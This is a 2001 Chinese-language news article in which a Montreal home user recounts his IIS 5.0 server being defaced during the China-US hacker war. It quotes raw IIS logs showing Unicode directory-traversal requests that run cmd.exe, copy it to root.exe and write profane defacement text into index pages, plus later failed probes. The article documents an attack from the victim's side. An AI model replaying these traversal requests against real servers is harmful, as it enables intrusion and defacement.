(//tvsmo.com)
【大紀元5月10日訊】 天天在家里上网,每天都要去新浪网和网易,當然也少不了看看中美黑客网絡大戰的最新戰報。真可謂人在海外,不忘祖國。但我無論如何也沒想到中美黑客网絡大戰會影響到我。
其實我并沒有將家里計算机作為网站,我用ADSL上网,由于沒有任何限制,加上不站電話線,所以我的計算机一開就在Internet上。我家有兩台PC,所以我在一台PC上裝了Windows 2000,當然也裝了IIS 5.0,昨天我用http:127.0.0.1在我的PC上一看,原來微軟IIS預裝的例子网頁卻成了如下的黑底紅字。
fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn
原來來自祖國的黑客把我在加拿大蒙特利爾Montreal家里計算机給黑了。
以下部分IIS記錄。
2001-05-07 00:47:52 209.218.XXX.XX – 64.23X.XXX.XXX 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+.. 200 –
2001-05-07 00:47:52 209.218.XXX.XX – 64.23X.XXX.XXX 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+winnt
system32cmd.exe+root.exe 502 –
2001-05-07 00:47:52 209.218.XXX.XX – 64.23X.XXX.XXX 80 GET /scripts/root.exe /c+echo+^^^^^^^^^^^^fuck+USA+
Government^^^^^fuck+PoizonBOx^^^^contact:sysadmcn@
yahoo.com.cn^>.././index.asp 502 –
2001-05-07 00:47:53 209.218.XXX.XX – 64.23X.XXX.XXX 80 GET /scripts/root.exe /c+echo+^^^^^^^^^^^^fuck+USA+
Government^^^^^fuck+PoizonBOx^^^^contact:sysadmcn@
yahoo.com.cn^>.././index.htm 502 –
2001-05-07 00:47:53 209.218.XXX.XX – 64.23X.XXX.XXX 80 GET /scripts/root.exe /c+echo+^^^^^^^^^^^^fuck+USA+
Government^^^^^fuck+丫PoizonBOx^^^^contact:sysadmcn@
yahoo.com.cn^>.././default.asp 502 –
我不知道我的計算机是否也算那被攻破的美國1600多個网站之一。如果真是這樣的話…我真為你們臉紅。
作為一個計算机的專家,我知道要黑一個一般的网站不是一件很難的事。我從來不用网上銀行,因為我總覺得不安全。我知道Windows有很多bug,我也知道unicode漏洞,只是自己很忙,就沒有去下載微軟的補丁。再說我的計算机也不是總開著,而且還是動態IP,又不是正式的网站,也就沒有在意。而恰恰是這一unicode漏洞,在我新浪网上看那恨可但又沒法讓自己忘卻的中國足球的時刻,讓來自祖國所謂的黑客給黑了。
我不知道攻破我的黑客是否和去年Montreal的十五歲的Mafiaboy一樣,只是在Internet下載一些黑客工具,并不是什么計算机天才(這是加拿大警察的結論)。如果是這樣的話,還是把你的時間花在學習上的好,千万別上了某些國內記者宣傳的當,以為黑了几台像我這樣的計算机,就成了高手。如果攻破我的黑客是一位真正的高手,你就應該利用你的技術干點正事。
昨晚就在我寫這几句的時候,黑客又來了,以下部分是IIS記錄。
2001-05-09 02:06:37 198.138.XX.XX – 64.23X.XXX.XXX 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 –
2001-05-09 02:06:37 198.138.XX.XX – 64.23X.XXX.XXX 80 GET /scripts/…./winnt/system32/cmd.exe /c+dir 404 –
2001-05-09 02:06:42 198.138.XX.XX – 64.23X.XXX.XXX 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 403 –
沒想到今天,又有黑客光臨。
2001-05-09 12:53:45 207.179.X.XXX – 64.23X.XXX.XXX 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 –
2001-05-09 12:53:45 207.179.X.XXX – 64.23X.XXX.XXX 80 GET /scripts/…./winnt/system32/cmd.exe /c+dir 404 –
2001-05-09 12:53:48 207.179.X.XXX – 64.23X.XXX.XXX 80 GET /scripts/…./winnt/system32/cmd.exe /c+dir 404 –
當然,這兩次沒有成功。也許我真應該去微軟下載補丁。
我真不知道你們為啥對64.23X.XXX.XXX如此的感興趣。64.23X.XXX.XXX不是美國海軍网站,只是加拿大最大ISP Sympatico的個人用戶,大部分人都是和我一樣的普通老百姓,請別再瞎黑。該不會是PoizonBOx的成員也用64.23X.XXX.XXX吧?
請別再瞎黑
想了解unicode漏洞詳情,請訪問//www.microsoft.com/technet/security/bulletin/ms00-078.asp
相關文章